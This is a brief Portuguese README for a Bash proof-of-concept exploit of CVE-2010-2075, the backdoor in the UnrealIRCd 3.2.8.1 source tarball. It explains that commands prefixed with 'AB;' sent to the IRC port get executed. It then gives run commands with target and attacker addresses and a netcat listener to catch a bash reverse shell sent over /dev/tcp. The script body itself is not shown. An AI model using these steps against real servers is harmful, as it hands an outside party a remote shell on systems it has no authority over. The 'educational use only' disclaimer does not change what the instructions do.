
Exploit CVE-2010-2075
Bash PoC para o backdoor introduzido no tarball de código-fonte do UnrealIRCd 3.2.8.1.
O binário comprometido executa comandos arbitrários prefixados com AB; enviados à porta IRC.
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
Exemplo:
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
Configure um listener antes de executar:
nc -lvnp 4444
O backdoor verifica os dados recebidos em busca do prefixo AB; e passa o restante
para o shell do sistema. O payload envia um reverse shell bash via /dev/tcp.
Apenas para fins educacionais e testes autorizados.